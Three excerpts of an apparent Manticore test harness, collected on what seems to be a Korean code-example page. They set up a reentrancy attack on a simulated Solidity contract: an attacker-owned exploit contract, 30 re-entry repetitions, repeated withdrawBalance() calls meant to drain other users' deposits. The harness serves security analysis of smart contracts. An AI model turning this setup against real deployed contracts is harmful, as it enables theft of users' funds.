예제 #1
# Reentrancy test harness excerpt (Python 2 print statements). `seth`, `ABI`,
# `attacker_account`, `user_account`, `contract_account` and
# `exploit_source_code` are all defined outside this excerpt.
# NOTE(review): `seth` looks like a Manticore EVM instance -- confirm against
# the top of the file.
#
# Deploy the test contract compiled from exploit_source_code, owned by the
# attacker account.
exploit_account = seth.solidity_create_contract(exploit_source_code, owner=attacker_account)

print "[+] Setup the exploit"
# Point the test contract at the contract under test and pass 30 as the
# repetition count. The meaning of both setters is assumed from their names;
# the Solidity source that defines them is not shown here -- confirm there.
exploit_account.set_vulnerable_contract(contract_account)
exploit_account.set_reentry_reps(30)



print "\t Setting attack string"
# Commented-out alternative: hand-packed calldata bytes (not used).
#'\x9d\x15\xfd\x17'+pack_msb(32)+pack_msb(4)+'\x5f\xd8\xc7\x10',
# Function identifier derived from the signature string 'withdrawBalance()',
# stored in the test contract as the call it should issue on re-entry
# (presumably from its fallback function -- confirm in the Solidity source).
reentry_string = ABI.make_function_id('withdrawBalance()')
exploit_account.set_reentry_attack_string(reentry_string)


# Print the balance of each of the four accounts before any deposit made in
# this excerpt, as a baseline to compare against later output.
print "[+] Initial world state"
print " attacker_account %x balance: %d"% (attacker_account, seth.get_balance(attacker_account))
print " exploit_account %x balance: %d"%  (exploit_account, seth.get_balance(exploit_account))
print " user_account %x balance: %d"%  (user_account, seth.get_balance(user_account))
print " contract_account %x balance: %d"%  (contract_account, seth.get_balance(contract_account))


#User deposits all in contract
# No sender is given explicitly, so the API's default caller is used --
# presumably user_account; verify against the contract proxy's behaviour.
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)


# The deposit is routed through the test contract's proxycall(). The value is
# the same literal as the user's deposit above, although the log line calls
# it a small amount.
print "[+] Let attacker deposit some small amount using exploit"
exploit_account.proxycall(ABI.make_function_id('addToBalance()'), value=100000000000000000)

# Invoke withdrawBalance() through the test contract. If the contract under
# test transfers funds before it updates the caller's recorded balance, the
# callback can re-enter it; a contract that updates state first (or uses a
# reentrancy guard) should leave the user's deposit untouched. Comparing the
# balances after this call with the baseline printed above shows which case
# applies.
print "[+] Let attacker extract all  using exploit" 
exploit_account.proxycall(ABI.make_function_id('withdrawBalance()'))
예제 #2
# Reentrancy test harness excerpt (Python 2 print statements). `seth`,
# `contract_source_code` and `exploit_source_code` are defined outside this
# excerpt.
# NOTE(review): `seth` looks like a Manticore EVM instance -- confirm against
# the top of the file.
#Initialize user and contracts
# Both accounts start with the same balance literal.
user_account = seth.create_account(balance=100000000000000000)
attacker_account = seth.create_account(balance=100000000000000000)
# Contract under test, owned by the user account.
# NOTE(review): the trailing "Not payable" remark is not explained here, and
# addToBalance is called with a value further down -- confirm against the
# contract source what it refers to.
contract_account = seth.solidity_create_contract(
    contract_source_code, owner=user_account)  #Not payable
# Test contract compiled from exploit_source_code, owned by the attacker
# account.
exploit_account = seth.solidity_create_contract(exploit_source_code,
                                                owner=attacker_account)

#User deposits all in contract
# The value equals the user's full starting balance. No sender is given
# explicitly -- presumably the default caller is user_account; verify.
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)

# NOTE: this snapshot is taken after the deposit above, so the "initial"
# figures already include that transfer.
print "[+] Initial world state"
print "     attacker_account %x balance: %d" % (
    attacker_account, seth.get_balance(attacker_account))
print "     exploit_account %x balance: %d" % (
    exploit_account, seth.get_balance(exploit_account))
print "     user_account %x balance: %d" % (user_account,
                                            seth.get_balance(user_account))
print "     contract_account %x balance: %d" % (
    contract_account, seth.get_balance(contract_account))

print "[+] Setup the exploit"
# Point the test contract at the contract under test (setter semantics
# assumed from its name; the Solidity source is not shown here).
exploit_account.set_vulnerable_contract(contract_account)

# Pass 30 as the repetition count for the re-entrant call.
print "\t Setting 30 reply reps"
exploit_account.set_reentry_reps(30)

# Unlike a fixed function identifier, the re-entry payload here is
# seth.SByte(4). NOTE(review): in Manticore this is a 4-byte symbolic buffer,
# which would leave the called function for the solver to choose, so the
# analysis covers every function reachable on re-entry rather than one
# hand-picked call -- confirm against the API version in use.
print "\t Setting reply string"
exploit_account.set_reentry_attack_string(seth.SByte(4))
예제 #3
# Reentrancy test harness excerpt (Python 2 print statements). `m`, `ABI`,
# `attacker_account`, `user_account`, `contract_account` and
# `exploit_source_code` are all defined outside this excerpt.
# NOTE(review): `m` looks like a Manticore EVM instance -- confirm against
# the top of the file.
#
# Deploy the test contract compiled from exploit_source_code, owned by the
# attacker account.
exploit_account = m.solidity_create_contract(exploit_source_code,
                                             owner=attacker_account)

print "[+] Setup the exploit"
# Point the test contract at the contract under test and pass 30 as the
# repetition count. The meaning of both setters is assumed from their names;
# the Solidity source that defines them is not shown here -- confirm there.
exploit_account.set_vulnerable_contract(contract_account)
exploit_account.set_reentry_reps(30)

print "[+] Setting attack string"
# Commented-out alternative: hand-packed calldata bytes (not used).
#'\x9d\x15\xfd\x17'+pack_msb(32)+pack_msb(4)+'\x5f\xd8\xc7\x10',
# Function identifier derived from the signature string 'withdrawBalance()',
# stored in the test contract as the call it should issue on re-entry
# (presumably from its fallback function -- confirm in the Solidity source).
reentry_string = ABI.make_function_id('withdrawBalance()')
exploit_account.set_reentry_attack_string(reentry_string)

# Print the balance of each of the four accounts before any deposit made in
# this excerpt, as a baseline to compare against later output.
print "[+] Initial world state"
print " attacker_account %x balance: %d" % (attacker_account,
                                            m.get_balance(attacker_account))
print " exploit_account %x balance: %d" % (exploit_account,
                                           m.get_balance(exploit_account))
print " user_account %x balance: %d" % (user_account,
                                        m.get_balance(user_account))
print " contract_account %x balance: %d" % (contract_account,
                                            m.get_balance(contract_account))

#User deposits all in contract
# No sender is given explicitly, so the API's default caller is used --
# presumably user_account; verify against the contract proxy's behaviour.
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)

# The deposit is routed through the test contract's proxycall(). The value is
# the same literal as the user's deposit above, although the log line calls
# it a small amount. When reviewing the contract under test, the property to
# check after the later withdrawal step (outside this excerpt) is that the
# user's deposit is still held by contract_account.
print "[+] Let attacker deposit some small amount using exploit"
exploit_account.proxycall(ABI.make_function_id('addToBalance()'),
                          value=100000000000000000)